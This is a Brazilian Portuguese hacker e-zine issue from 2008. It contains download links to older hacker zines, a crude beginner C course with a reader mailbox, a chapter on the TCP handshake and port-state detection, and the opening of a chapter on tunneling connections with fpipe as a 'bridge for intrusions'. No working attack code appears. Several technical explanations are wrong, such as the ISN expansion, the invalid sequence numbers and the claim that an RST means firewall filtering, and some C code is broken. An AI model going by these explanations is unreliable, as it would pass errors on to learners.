=============================================================================== =============================================================================== ||XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX|| ||XXXXXXXXXXXXXXXXXXX VIPER CORP APRESENTA XXXXXXXXXXXXXXXXXXXXXXX|| ||$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$|| ||$$$$$$$$$[[[+ ================================================== +]]]]$$$$$$$$$$$$|| ||$$$$$$$$$[[[+ +]]]]$$$$$$$$$$$$|| ||$$$$$$$$$[[[+ +]]]]$$$$$$$$$$$$|| ||$$$$$$$$$[[[+ -[+]--------------------------------[+]- +]]]]$$$$$$$$$$$$|| ||$$$$$$$$$[[[+ C.O.D.E +]]]]$$$$$$$$$$$$|| ||$$$$$$$$$[[[+ +]]]]$$$$$$$$$$$$|| ||$$$$$$$$$[[[+ COMPUTADORES - ORGASMO - DESTRUIÇÃO - E-ZINES +]]]]$$$$$$$$$$$$|| ||$$$$$$$$$[[[+ [As 4 coisas que eu mais gosto na vida] +]]]]$$$$$$$$$$$$|| ||$$$$$$$$$[[[+ +]]]]$$$$$$$$$$$$|| ||$$$$$$$$$[[[+ -[+]--------------------------------[+]- +]]]]$$$$$$$$$$$$|| ||$$$$$$$$$[[[+ +]]]]$$$$$$$$$$$$|| ||$$$$$$$$$[[[+ [AINDA NÃO TENHO UM BANNER] +]]]]$$$$$$$$$$$$|| ||$$$$$$$$$[[[+ +]]]]$$$$$$$$$$$$|| ||$$$$$$$$$[[[+ MANDE SEUS ASCIIs PARA +]]]]$$$$$$$$$$$$|| ||$$$$$$$$$[[[+ +]]]]$$$$$$$$$$$$|| ||$$$$$$$$$[[[+ +]]]]$$$$$$$$$$$$|| ||$$$$$$$$$[[[+ ==================================================== +]]]]$$$$$$$$$$$$|| ||XXXXXXXXXXXXXXXXANO 1 - Nº00 1/1/2008 BY 6_BL4CK9_F0X6 XXXXXXXXXXXXXXXXXXX|| ||XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX|| =============================================================================== =============================================================================== [+ ======X============X===============X===== +] INDICE [+ ======X============X===============X===== +] ############################################################################################ [Uma grande parte dos capitulos desta primeira ediçao da CODE foram escritos originalmente] [para o maldito forum Darkers no qual fui banido, dae resolvi escrever uma zine com meus txts que escrevi la] #include ......................................................................................../6_Bl4ck9_f0x6 #include ........................................................................................../6_Bl4ck9_f0x6 #include ................................................../6_Bl4ck9_f0x6 #include ............................................./Cheat Struck #include http://www.hunterhacker.xpg.com.br/axur0500.zip axur0501 -------------------- > http://www.hunterhacker.xpg.com.br/axur0501.zip axur0502 -------------------- > http://www.hunterhacker.xpg.com.br/axur0502.zip axur0503 -------------------- > http://www.hunterhacker.xpg.com.br/axur0503.zip ================================================================== [RwX - Das antigas, muito maneira] ::::::::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::""`````""::::::""`:.:`""::"`````"::'"```'.::::: ::::: .g#S$$$$$S#n .g#S$$ $$S#n. $$$S#s s#S$$$ ::::: ::::: $$$$$$ $$$$$ $$$$$$ $$$ $$$$$$ . $$$ $$$ .::::: ::::: $$$$$$g$$$$$. $$$$$$ $$$ $$$$$$ :' $$g$$ .:::::: ::::: $$$$$$ $$$$$$ $$$$$$ $$$ $$$$$$ ' $$$$ $$$$ '::::: ::::: $$$$$$ $$$$$ $$$$$$.$$$.$$$$$$ $$$$$ . $$$$$ ::::: ::::: $S$$$$ $$$$ `S$$$$$$$$$$$$$S'.`S$$ : $$S'.::::: :::::.......:.....:::.............:::....:::....::::::: ::::::::::::::::::::::::::::::::::::::::::::::::::::::: rwx-0 -------------------- > http://www.hunterhacker.xpg.com.br/rwx-0.zip rwx-1 -------------------- > http://www.hunterhacker.xpg.com.br/rwx-1.zip rwx-2 -------------------- > http://www.hunterhacker.xpg.com.br/rwx-2.zip rwx-3 -------------------- > http://www.hunterhacker.xpg.com.br/rwx-3.zip rwx-4 -------------------- > http://www.hunterhacker.xpg.com.br/rwx-4.zip rwx-5 -------------------- > http://www.hunterhacker.xpg.com.br/rwx-5.zip rwx-6 -------------------- > http://www.hunterhacker.xpg.com.br/rwx-6.zip ================================================================== P h o n e 9 (c) 1 9 9 8 p r o d u c t i o n s reg - (r) none rights reservaded. __ __/\______\ \_ ________ ________ _______ ___/\_ \__ // \/ \__\___ /____\__ _/ _ \ // -- / [-]\ __/ \ /_ / /_____\___. / _/ ___/___/ \_ __/\____/ /______ /__/ // \/----/ /_____\\___/ //____/ /____\____/ [c] P h o n e 9 (c) p r o d u c t i o n s. phone9-00 -------------------- > http://www.hunterhacker.xpg.com.br/phone9-00.zip phone9-01 -------------------- > http://www.hunterhacker.xpg.com.br/phone9-01.zip phone9-02 -------------------- > http://www.hunterhacker.xpg.com.br/phone9-02.zip ================================================================== OS EDITORES DESTA ZINE SAO HACKERS DE SANGUE PURO UNDERGROUND PURIIIISSSSSIIIMOOOO!!! +-+-+-+-+-+-+-+-+-+-+----+-+-+-+-+-+-+-+-+-+-+-+ Este documento pode conter informacoes ilegais ou somente para fins *EDUCATIVOS*. Se usa-las para *OUTROS* fins a responsabilidade sera sua +-+-+-+-+-+-+-+-+-+-+----+-+-+-+-+-+-+-+-+-+-+-+ =-= Near(Z) =-=-=-=-= TheGhostObtruder =-=-=-=-= TheRevenge =-=-=-=-=-=-=-=-=- 00 ³ú úúú.úúúúúú úú.ú úúúúú úú.úúúú ú.úúúú.úúúú úúúú.úúú úúúú.úúúú ú.úú ÄÄÄͼú.úúú úÅXÅxú .úú `úúú,ú ú.úú úúúú,úúúú úú.ú.ú.úúú úú,úúú`úú úú.úúúúú úúú ,úúxÅXÅxúúúú.úÅXÅúúú úúú.úú úúú úúúXÅxÅxúúúú úúú.úúú úúú.úúúú.úúú úúúú.úú.úúÅxÅxÅXú. úúxÅxúúúÉÊÍËÍÊÍËÍÊú úÅxÅxÅxÅXÅúúúÎÁÍÂÍÁÍ¿úúú., úúúúú . úúúúúúXÅxúxÅxú.ú ÅxÅúú͹. .úú ú.úúúÅxÅú .ú ÅxÅúÄÅÄ.úú.úÌÄú. ú`ú .úúúúú .úúúúúú .úÅxÅ`úXÅx úúXÅxú.úÌÍú.ú,ú.ú úúxÅX,úú.úxÅXú.Ìú., úúÅÄúúúú ú.,úúú ú.úú, úúúxÅXúúúxÅXú.ÅxÅúú͹úúúúúúú. úúÅxÅúú. úÅxÅúÄÅúú .úúÌÄú`úú úú úúú.úú úú úú.úúÅxÅúú.úxÅxúxÅXúú.ÌÍÊÍËÍÊúú.úúxÅxÅXÅxÅXÅxúúÎÄÍÂÍÁÂÅúú úú.ú úúúú úúúú.úú úúúxÅxú úúúXÅxÅxÅúú.ÌÍúú .ú úúúúÅXÅxÅxÅxÅxÅúÄÅ `úú ÌÄú.úú,úú úúúúú, úúÅXÅúú.ú úxÅXÅxúú͹. ú.úúúú.úúxÅxú .úúxÅXúúÌÄúú,úÅÄ` ú.úú úú.úúxÅxú`ú ,úúxÅxÅ`ú.ÌÍú`úú,.úúúúÅxÅú`ú.úÅxÅúÄÅú úúúÌÄú.úúú úú.ú úúú.ú úúúÅXÅ ú.úú .úxÅXúúúÈËÍÊÍËÍÊÍËúúXÅx,.ú úXÅxúúÌÄúú,úÀ¿úúú.,úúú.úú úú,. úúúú.úú ú,úúú.úúúúúú .úúú` ú.úú úúúú.úúúúúú ú.úúúúúú`úúúúú. úú.úú ú úú.úú úú.úúúú ú. úú ú.úú,úú úúú.úúúúú.ú úúú úúú.ú úúúú.úúúú =-= Near(Z) =-=-=-=-=-=-=-=-=-= issue 00 =-=-=-=-=-=-=-=-=-=-=-=-= Near(Z) =-= nz00 -------------------- > http://www.hunterhacker.xpg.com.br/nz00.zip nz01 -------------------- > http://www.hunterhacker.xpg.com.br/nz01.zip nz02 -------------------- > http://www.hunterhacker.xpg.com.br/nz02.zip nz03 -------------------- > http://www.hunterhacker.xpg.com.br/nz03.zip nz04 -------------------- > http://www.hunterhacker.xpg.com.br/nz04.zip nz05 -------------------- > http://www.hunterhacker.xpg.com.br/nz05.zip nz06 -------------------- > http://www.hunterhacker.xpg.com.br/nz06.zip nz07 -------------------- > http://www.hunterhacker.xpg.com.br/nz07.zip nz08 -------------------- > http://www.hunterhacker.xpg.com.br/nz08.zip nz09 -------------------- > http://www.hunterhacker.xpg.com.br/nz09.zip nz10 -------------------- > http://www.hunterhacker.xpg.com.br/nz10.zip ================================================================== [Agosto de 1997] °°°°--------------------------------------------------------------------°°°° ±±±± ±±±± ²²²² ²²²² ÛÛÛÛ H A C K N' P H R E A K ÛÛÛÛ ²²²² ²²²² ±±±± ZINE ±±±± °°°°--------------------------------------------------------------------°°°° hacphr00 -------------------- > http://www.hunterhacker.xpg.com.br/hacphr00.zip hacphr01 -------------------- > http://www.hunterhacker.xpg.com.br/hacphr01.zip hacphr02 -------------------- > http://www.hunterhacker.xpg.com.br/hacphr02.zip hacphr03 -------------------- > http://www.hunterhacker.xpg.com.br/hacphr03.zip ================================================================== [Data da primeira edição /03/2000] _ __ ___________________________ __________________________ ____ \ ______ _ _______ _______ \___ _______by_Cheat_Struck__/ / /_ ____ ________ _____ / / /___ ____ ____ ____ / / _ \__ __/ _ \/ / /_ / _ \ _ \ \ _ \ / _ / / _ / /__ / / _ / _ / _/ / _ / __/ / __/ / / __/______\____/ / _\ / _\____/ / _\ )/ )/ )/ )/ )/ )/ ' ' ' ' ' ' f3-00 -------------------- > http://www.hunterhacker.xpg.com.br/f3-00.zip f3-01 -------------------- > http://www.hunterhacker.xpg.com.br/f3-01.zip f3-02 -------------------- > http://www.hunterhacker.xpg.com.br/f3-02.zip f3-03 -------------------- > http://www.hunterhacker.xpg.com.br/f3-03.zip f3-04 -------------------- > http://www.hunterhacker.xpg.com.br/f3-04.zip f3-05 -------------------- > http://www.hunterhacker.xpg.com.br/f3-05.zip f3-06 -------------------- > http://www.hunterhacker.xpg.com.br/f3-06.zip f3-07 -------------------- > http://www.hunterhacker.xpg.com.br/f3-07.zip f3-08 -------------------- > http://www.hunterhacker.xpg.com.br/f3-08.zip f3-09 -------------------- > http://www.hunterhacker.xpg.com.br/f3-09.zip Essas são apenas algumas zines galera, obviamente que postarei muito mais links de boas zines da decada de 90 para vocês nas proximas edições. Espero que tenham ouvido o meu apelo com relação a desenvolver novas zines, pois eu faço questão de divulgalas no meu site, estou pensando eu mudar de host, pois o XPG tem muitas propagandas dae num rola vocês ter que ficar vendo muitos banners que num é do site, sem contar que o espaço pra pagina do site fica meio pequeno pra tantas propagandas, estou pensando em ir para a webng pois não tem propaga. Atualmente não estou escrevendo mais para o meu site e não estou postando mais conteúdo, você vão ver ele do jeito que esta por um bom tempo. Vou me dedicar apenas a C.O.D.E de agora em diante, mas se eu resolver mesmo mudar de host eu vou começar a atualizar ele. ----- C4p1Tul0 06 [+ ======X============X===============X===== +] CURSO DE LINGUAGEM C PARTE 1 [+ ======X============X===============X===== +] Bem galera, aqui e a primeira parte do curso de C, nao vou falar da historia do C, nem dessas babozeiras que voce esta acostumado a ler por ae, pois a intençao aqui é botar a mao na massa e explicar com se fazer a coisa e nao mostrar tecnicamente como a coisa acontece no sistema.....?.....Bah! Nao sei explicar direito, mas vamos la. Gostaria de dizer que este curso é o basico e é destinado a quem ja tem um certo conhecimento em C, e de vez em quando vou dar uma colher de cha para os iniciantes, ou seja, voce vera coisas de facil compreensao e muuuita explicaçao "algumas vezes". 00 - Incluir o que? Antes de voce declarar uma funçao em C (o que? nao sabe o que e funçao? Procura em outro lugar, aqui eu so ensino a botar a mao na massa) voce precisa primeiramente incluir ela no seu programa....dã....essas tais funçoes estao localizadas nas bibliotecas de cabeçalho ou headers (cabeçalho em ingles), caso nao inclua as bibliotecas que abrigam as funçoes, voce nao poderá usar tais funçoes, exemplo. Para incluir a funçao printf ("falarei log mais"), tu teras que fazer isso: #include //Essa e a biblioteca de cabeçalho que guarda a funçao printf int main (void){ printf ("Oi"); //Funçao printf declarada, so pudi declarar essa funçao porque especifiquei la em cima o header stdio return (0);} Para nos podermos utilizar a funçao printf nos temos que primeiramente "incluir" no nosso codigo a biblioteca que guarda essa funçao, resumindo: Tu so poderas declarar uma funçao se primeiramente incluir a biblioteca que guarda a funçao, sacou? vou repetir: Tu so poderas declarar uma funçao se primeiramente incluir a biblioteca que guarda a funçao!!! Para incluir uma biblioteca ou header, tu teras que escrever o seguinte: #include Repare no #include, é include mesmo pessoal, include significa incluir em portugues, nao se esqueça de colocar a tralha antes do include, assim o compilador vai saber o quando voce esta dalacrando o include. Agora repara la em cima na biblioteca stdio.h, pois é, essa é a biblioteca padrao do C, antes de começar qualquer programa em C tu teras primeiro que incluir esta biblioteca, uma grande parte das funçoes "mais usadas nos programas" está contida nesta biblioteca. Vamos agora a uma traduçao deste header. Contraçao Significado em ingles Significado em Portugues std Standard Padrao i Input Entrada o Output Saida .h .Header .Cabeçalho O h denominda um C Header File ou arquivo de cabeçalho em C, como o txt é um arquivo de texto por exemplo, entao vamos dar uma resumida aqui, stdio.h significa: Cabeçalho padrao de entrada e saida. Torno a repetir, antes de começar escrever seus codigos inclua esta biblioteca, caso contrario nao poderas incluir as funçoes mais importantes do C (falarei logo mais) que estao incluidas neste cabeçalho, e para incluir use o #include <... :-) Analisando outra vez o codigo #include //Incluir no codigo a biblioteca stdio.h que contem a funçao printf int main (void) { printf ("Oi"); //Declarei a funçao printf, pois acima incluir a biblioteca stdio.h que contem esta funçao :0) return (0); } Repara agora no "main", o main é a funçao principal do C, é abaixo dela que os codigos "começaram" a ser executados, nao importa o que tem pra traz ou mais para baixo, ele sempre vai começar a execuçao dos codigos abaixo desta funçao, que podera conter chamadas para outras funcoes. A funçao printf exibe coisas na tela, e como se fosse um echo em batch, no meu exemplo a "funçao" printf escreve a string Oi na tela. Declarei a funcao main como inteira (int), ou seja, ela retorna uma inteiro [Nas proximas ediçoes falarei mais sobre return ;-)] e na lista de argumentos coloquei void, que significa vazio. Void e um tipo sem tipo, ele esta ali simplesmente para dizer que nao existem argumentos para a funcao main. O return (0) foi usado para fechar o programa. De uma olhada no code outra vez e rapare que os codigos em C sempre esta dentro de chaves, elas sao usadas para abrir "{" e fechar "}" o bloco de codigo, como no HTML e utilizada a tags de abertura e as tags de fechamento . Vamos ao exemplo do comando "for" agora. ====================================== MAIL BOX NO MEIO NO CURSO DE C Entendeu a piada? Mail no meio hauhauHUhuh!!! ======================================= Mau a zine começou a ja existem caras com duvidas eheh, mas voce deve estar se perguntando: Mas como se a zine começou agora? Simples, passei 2 meses anunciando que a zine ia sair, dae apareceu uma porrada de email dos caras ja com duvidas HuahuHauhUha!!! Nem um filho da puta quiz mandar materia, vao tomar no cu pessoal hauhuahua!!! Brincadeira, vamos a unica duvida que achei melhor responder na zine do que no MSN, porque tem tudo aver com o curso de C, mas normalmente nao respondo perguntas aqui, pois esta nao e a seçao que vou responder duvidas, vai ter uma mail box e tals, normalzinha e show de bola Huahauha!!!. ======================================================================= Mail <*****@bol.com.br> Ei cara, estou com um probleminha aqui. O negocio e o seguinte: To desenvolvendo ai um code que ler string e grava em um arquivo, se voce nao entendeu eu quiz dizer CADASTRADOR DE CLIENTE, e que eu to afim de ganhar uma grana ae com o C tambem, vi que isso e possivel em um tutorial que achei na internet, mas to tendo problema aqui, pois nao consigo gravar o arquivo com a string, putz grilo.....nem compilar eu to conseguindo, ei filho, se voce rir eu te mato, sabe que sou melhor que voce em Assembler, entao respeita ai os mais velhos pirralho hahahahahHauhuah. Sei mecher com ponteiro e o FILE, entao me poupe dos detalhes, Helpme, per favore velho, cê é muito foda entao ve se me ajuda ae. RESPOSTA: Ei tio, porque tu num mandou o code tb mula, como e que eu vou saber o que tu ta errando? Mas vamos la, deixa eu ver aqui, voce quer um cadastrador de cliente certo? e quer que os resultados sejam gravados no arquivo recem criado e pirralho e a mae!!!!! Vamos la, tenta isso ae, so que como putc obvio: [Reposta para os leitores da minha zine] #include #include int main (void){ int x; char vogais[100] = "AEIOU\n"; printf ("As vogais sao:"); for (x=0;vogais[x];x++){ printf ("%c", vogais[x]);} system ("pause"); return (0);} Quando voce for usar o printf para exibir varios caracteres um a um na tela usando a funcao for, tu teras que lelos usando o leitor de caractere "%c"; Ja para escrever em arquivo tu teras que declarar a variavel que possui a string armazenada seguida do operador que executara a funcao "for" que nesse caso e o inteiro x*/ [Resposta para o tiozinho] FILE *pt; pt=fopen ("TIOZINHO.txt", "w"); if (!pt){ printf ("Nao conseguir escrever no arquivo TIOZINHO.txt\n"); system ("pause"); exit (0);} else { printf ("O arquivo TIOZINHO.txt foi aberto com sucesso...\n"); Sleep (1000); system ("cls"); printf ("Digite o nome do cliente:"); scanf ("%s", cliente.nome); char clin[100]; strcpy (clin, "Nome:"); strcat (clin, cliente.nome); for (others.xXx=0; clin[others.xXx]; others.xXx++) putc (clin[others.xXx], pt); printf ("O cliente de %s %s foi cadastrado com sucesso no arquivo TIOZINHO.txt \n\a", clin, cliente.nome); system ("pause"); fclose (pt);}} return (0); } Ei TIOZINHO, espero que voce note que criei estruturas no meu code e por isso faço referencias a elas (so criei porque vou ensinar logo mais hauhauah!!!), Ei Ei Ei, facilitei a tua vida ae maluco, fiz o code imprimir no database uma string predefinida Nome: Dae tu faz as adapt pra tuas necessidades. Num esquece do header porque se tu num bota pode esquecer do strcat e strcpy, espero ter ajudado e se mesmo assim tu num consegui te mando o teu cadastrador de cliente prontinho Huahuahauh!!! 20 minutos e faço um muito loco, so preciso adaptar o que eu fiz em perl para o C ehehhe. ---------------- END MAIL BOX -------------------- Para colocar comentarios no C utilize // para apenas uma linha de comentario ou /* para abrir um sequencia de comentarios, para fechar a segunda auternativa utilize */. Apareceu uma biblioteca nova na area e duas funçoes. Vamos falar primeiramente da biblioteca stdlib.h ou simplesmente standard library que significa em portuga: Biblioteca padrao. Quando voce inclui esta biblioteca no seu codigo significa que voce esta afim de incluir alguma funçao que existe dentro dela :-) eheh (so pra relembrar), ou seja, reparem ae na funçao system. A funçao system e uma funçao contida na biblioteca stalib.h e que possibilita que se execute comandos do proprio OS na execuçao do codigo, voce podera fazer com que os comandos do sistema interajam com seu programa, neste caso depois que meu pequeno programa exibe o alfabeto na tela ele ira exibir a mensagem Pressione qualquer tecla para continuar... e ira pausar a execução do code apos o termino da exibiçao das letrinhas mais manjadas do mundo (aeiou). O comando pause quando digitado no prompt do DOS exibe esta mensagem. Outra coisa que eu gostaria de lhes alertar: Tome cuidado para nao esquecer de colocar o " ; " antes de declarar qualquer coisa, obvio que isso nao e regra, mas adiante voce entendera melhor. Reparem nesse trexos do code int x; char vogais[100] = "AEIOU\n"; printf ("As vogais sao:"); for (x=0;vogais[x];x++){ printf ("%c", vogais[x]);} Declarei uma variavel do tipo char que possue 99 caracteres de espaco em seu buffer, 99? Isso mesmo, 99, porque o indice no C começa em 0, ou seja, se tivesse declarado uma variavel do tipo char com 10 de pilha, o 10 seria o 9. Tambem declarei a variavel x do tipo inteiro e utilizei o comando for para que continue a executar um bloco de codigo. Declarei que a variavel do tipo x possui um valor igual a 0 no for, depois declarei que a variavel que possue a string vai interagir com a execução do for, ou seja, posso escrever cada caractere contido na variavel vogais, pois estou utilizando o [x] que e o operador usado para continuar a execuçao dos comandos abaixo do for, e adicionei a variavel do tipo inteiro x dois sinais de mais "++" para ecrementar a operaçao, o ++ encrementa o valor da variavel cada vez que o looping e feito. ESTRUTURAS EM C Para criar uma estrutura use o struct nome_da_estrutura, uma strutura nada mais e que uma variavel que agrupa varias outras de varios tipos em uma so, como no exemplo abaixo. #include #include struct o_cara{ char nome[3]; int numero; }david; //A variavel david do tipo struct possui esses campos acima int main (){ //Vamos preencher os tais compos david.numero = 10; printf ("O numero %d", david.numero); return (0); } Neste exemplo acima david e uma variavel do tipo estrutura que possue varios campos como o campo nome do tipo char e numero do tipo inteiro. Para fazer referencia a intens contidos dentro de uma estrutura basta utilizar: variavel.campo_dentro_da_estrutura david.numero. O ponto "." e utilizado para fazer referencias a campos dentro de uma variavel do tipo struct, voce podera declarar varias variaveis do tipo struct e fazer referencia aos campos que as mesmas de certa forma "compartilham", assim: #include #include struct o_cara{ char nome[3]; int numero; }david, grace; int main (){ david.numero = 10; grace.numero = 55; printf ("\nMeu numero favorito e o: %d\n\a", david.numero); printf ("O numero favorito de minha namorada e: %d\n\n", grace.numero); system ("pause"); return (0); } Resultado: Meu numero favorito e o:10 O numero favorito de minha namorada e o: 55 Pressione qualquer tecla para continuar..... Chegamos ao final da primeira parte do curso de C, espero que tenham gostado e se quiserem coisas mais mastigadas manda um email ae que farei questao de ajudar. Ate a aula numero dois galera.... ----- C4p1Tul0 07 [+ ====================================== +] Entendendo o Three Way Handshake 6_Bl4ck9_f0x6 [+ ====================================== +] Aprendi a pouco tempo e gostaria de ensinalos, ei ei ei, Cloudy, descobri que uma de suas fontes de estudo foi o livro universidade hacker ehehe, vi uma leve adaptaçao feita por voce tendo como base o exemplo do fabricio (me refiro a como se parece um ISN), eu dei uma melhorada neste texto, comparado ao que eu tinha postado no forum, e dei uma encrementadinha no final, em umas das flags citadas no forum. Galera.... esse capitulo ta show de bola!!! Three Way HandShake Quando uma maquina pretende se conectar a outra no TCP primeiramente ela faz um pedido de conexao sinalizando isso com o que nos chamamos de flag, que na mais e que um pacote que a mesma emite para o host remoto dizendo que deseja estabelecer uma conexao neste host em alguma porta que ele esteja escutando, o cliente emite o que nos chamamos de pacote de sincronismo, ou simplesmente SYN, que vem de synchronize (sincronizar). O pacote SYN e o primeiro passo para iniciar qualquer conexao por TCP, o cliente emite este pacote e aguarda uma resposta do host remoto. Pois bem, quando a maquina que solicitou a conexao (a maquina que emitiu o SYN) evia um pacote com uma flag de sincronismo, ela tera que esperar uma resposta do host remoto (obvio), esta resposta vem com um segundo pacote SYN e um outro pacote, mas so que dessa vez o pacote e o ACK, que vem de ACKnowledge, este pacote e emitido quando o servidor recebe o pacote com a flag SYN, pois ele tera que retornar uma resposta, ou seja, quando uma maquina emite este pacote ela esta dizendo que recebeu e aceitou o pacote anterior, isso funciona mais ou menos assim: Cliente [Quero me conectar em uma porta sua!!! (SYN)] ------------------ > Host remoto (huuuum...) Host remoto [Tudo bem, eu deixo!!! (SYN+ACK)] ----------------------- > Cliente (vixi!, ele deixou, hauhuah) Cliente [Entao la vai!! (ACK)] --------------------------------------------- > Host remoto (empurrou com tudo huahua!!) Sacou porque isso se chama "Three" Way Handshake? Simplesmente porque antes de qualquer conexao (aperto de maos) e necessario a negociaçao em tres vias. Quero passar um conhecimento mais profundo dos tres passos para voces estranhos e para o meu amorzinho que esta estudando informatica (minha mina), entao (para a felicidade de minha namorada :- ), maos a obra eheh. ISN - Internet Sequencial Number (Se aprofundando mais no negocio) Internet Sequencial Number ou simplesmente numero sequencial da internet, e como eu posso dizer... O que faz as coisas acontecerem no Handshake, isso mesmo, nao mencionei ele anteriormente, mas ele faz parte sim do negocio, siga essa ilustraçao abaixo. Ilustraçao de uma conexao bem sucedida entre dois hosts Hacker [SYN+ISN] --------------- > Alvo Alvo [SYN+ACK+ISN] ---------- > Hacker Hacker [ACK+ISN] -------------- > Alvo Hum, esta ilustraçao acima ta muito fraca e nao mostra como as coisas funcionam na realidade, entao vamos deixar a proxima ilustraçao um pouco mais complexa, ou "aparentemente" mais complexa (apenas preste atencao). Hacker [SYN, Seq= 785x 4fc0] -------------------------- > Alvo Alvo [SYN, Seq= 786x 5gc0+ACK, Seq=785x 4fc0 +1] --------------- > Hacker Hacker [ACK, Seq= 786x 5gc0 +1] ---------------------- > Alvo Acima estou mostrando como realmente a coisa acontece. Primeiramente o Hacker que deseja se conectar em uma porta em escuta no alvo emite um pacote com a flag SYN mais um numero de sequencia, este numero (ISN), é quem vai auxiliar o alvo como guia para o mesmo saber quem ele vai responder e a quem ele vai pedir algum pacote caso o mesmo venha a atrazar no seu emcaminhamento. Pois bem, como voce pode ver acima, o hacker manda alem do syn uma sequencia igual a 785x 4fc0 para o alvo, o alvo recebe o syn com a sequencia que foi gerada pelo Hacker (785x 4fc0) e no caso de existir realmente uma porta em escuta, emite outro pacote com a flag syn com um ISN igual a 786x 5gc0 para o hacker (para sincronizar a conexao) e tambem manda um ACK com os mesmos numeros de sequencia enviado anteriormente (785x 4fc0) +1 para dizer que recebeu e aceitou o pacote anterirmente enviado (SYN). Repare na semelhança desses ISNs Hacker 785x 4fc0 ------ 785 4f Alvo 786x 5gc0 ------ 786 5g Fiz esta ilustraçao apenas como exemplo, mas da pra entender bastante. Prestem atençao que alem do pacote ACK com a mesma sequencia gerada anteriormente pelo Hacker e +1, o alvo emite um novo ISN com numeros sequenciais, dae o nome: Internet "Sequencial" number, reparou no sequencial? eheheh Quando o alvo emite um SYN com os numeros sequenciais do enviado pelo Hacker sigifica que ele está disposto a interagir, ou seja, quer proceguir com a conexao. Logo após o recebimento do pacote SYN com a sequencia 786x 5gc0 gerada pelo alvo e o ACK com o mesmo numero de sequencia que tinha mandado anteriormente, a estaçao do hacker entao manda outro pacote com a flag ACK com os mesmos numeros de sequencia (786x 5gc0) enviados pelo host e +1 para dizer que ele recebeu o pacote anterior, agora sim o hacker podera estabelecer uma conexao com o alvo em uma porta qualquer que o mesmo venha a estar escutando. Sabendo quando uma porta TCP está fechada Como voce ja deve ter percebido, em uma conexao TCP quando uma porta esta aberta o host remoto emite um SYN+ACK como resposta a um pedido de conexao, mas como saber se uma porta TCP esta fechada? Simples, para sabermos distiguir apenas precisaremos conhecer a flag RST, que vem de RESET, assim bastaria testar as regras de saida do firewall para sabermos se uma determinada porta está ou não em escuta. A flag RST é emitida por um host como resposta a um TCP connect em uma porta que o mesmo nao esteja escutando, ou seja, a tal porta muito provavelmente está sendo filtrada por um firewall. Resumindo: Caso a porta esteja fechada o host manda um pacote ACK seguido do ISN emitido pelo cliente e +1 para dizer que recebeu o pacote anterior, e envia junto com esse pacote o RST para resetar a conexao. Sabendo quando uma porta UDP está fechada [Isso aqui não faz parte do handshake não, so escrevi para voce ter mais conhecimento] O método de saber se uma porta UDP está em escuta ou não em um host remoto é um pouco diferente do usado pelo TCP, ou seja, ao invés de ser enviado um SYN e esperar um SYN/ACK para determinar a porta aberta e um ACK/RST para uma porta fechada, no UDP o cliente envia um pacote UDP para uma porta do host, se for emitido como resposta um pacote ICMP de porta inalcansável (unreachable), a porta está fechada, caso contrario, evidentemente ela estará aberta (listenning). Vou dar uma encrementada ae "por cima" (como diz o cloudy) com outras flags que sao muito comuns: Finish - FIN: Finaliza uma conexão. Quando uma das estacoes emite um pacote com esta flag no final de uma transmissao TCP/IP (sempre no final, dã), significa que ela nao tem mais nada para ser enviado e está querendo encerrar a conexao, mas a estacao cliente ainda tem que esperar uma resposta do servidor para finalmente encerrar a conexao, pois o servidor pode pedir uma retransmissao dos dados caso algum pacote venha a chegar corrompido ate ele. Numa conexao TCP é muito comum um pedido de retransmissao, pois os pacotes pode ter sido corrompidos em algum momento no decorrer de seu trajeto pelos pontos de passagem (coisa que nao e muito dificio de acontecer). Se o servidor responder a um FIN com um ACK (Acknowledgement - "entendido") coisa que ele so fara quando receber todos os pacotes com seus devidos headers intactos, dae sim o cliente pode enviar o ultimo pacote de confirmaçao e acabar com a conversa eheh. As outras duas flags vou deixar com voces, vou passar a tarefa de pesquisar "afundo" sobre as mesmas, se quer moleza vai senter no pudim HuahuHuah!!! Urgent - URG: Essa flag sinaliza "Urgência na conexão". Push - PSH: Acelera a transmissão pra poder finaliza-la. Imagine o PSH como uma descarga de merda (quiz dizer agua na merda), e isso mesmo. A descarga enche de agua de uma hora pra outra o buraco do vaso, quando voce puxa a corda derrepente toda a merda vai pelo buraco da privada "que nao conheço o nome tecnico para esse troço", assim levando a merda embora para o reino encantado das merdas. Isso ocorreu porque eu dei velocidade a decida da agua que vai jogar a merda embora antes de mechela um pouquinho, sacou mano? ----- C4p1Tul0 08 [+ ======================================== +] Tunelando conexões - Port redirect - Criando ponte para invasoes 6_Bl4ck9_f0x6 [+ ======================================= +] E ae galera da segurança, estou trazendo ae "pra quem ainda nao conhece" uma boa dica para facilitar a vidade de voces, pois as vezes voce precisa acessar recursos de uma maquina dentro de uma NAT, mas como os endereços IPs atribuidos as maquinas filtradas por NAT nao sao roteaveis voce e obrigado a hospedar os tais recursos na DMZ ou acessar as maquinas da NAT usando algum tipo de software de assitencia remota pela DMZ, eu mesmo quando trabalhava com vendas de acessorios de informatica tinha de depositar varias informaçoes com relaçao as minhas vendas em computadores de uma NAT, sendo assim precisei acessar maquinas em uma NAT por um host na DMZ e ter que transformar uma DMZ em workstation e muito mais demorado do que se voce acessase tais recursos diretamente do host. Mas esse negocio de criar ponte workstation ja esta ultrapassado, o tempo de ficar mapeando unidades de rede pela DMZ para depois acessalas ja se foi. Ao inves de voce usar uma ponte (WorkS) pela DMZ porque nao ser redirecionado automaticamente para uma NAT e trabalhar diretamente nela? É isso que eu vou demonstrar agora. Tunelar diretamente o NetBIOS tambem é bastante interesante mas nao vem ao caso agora, pois vou demonstrar um modo generico, vamos logo falar da tecnica que mais estudo na vida, lembrando que vou passar o basicao do tunelamento, pois se fosse falar detalhadamente deste assunto com toda certeza gastaria mais ou menos um dia "sem parar" escrevendo, o tunelamento nao se resume apenas nisto, gostaria que voces estudasem tambem para podermos aperfeiçoar a tecnica, gostaria muito de sua ajuda. O programa que utilizarei e o fpipe para windows que e um programa bastante simples e vai ser mais facil demonstrar. Mas obvio que existem varios outro programas tao bons quanto o fpipe para ambientes Unix como o Corkscrew (saca-rolhas) que é uma ferramenta que tunela SSH para além e para aquém do proxy em HTTP. Os principais proxys que ele abre uma rota sao o Squid, 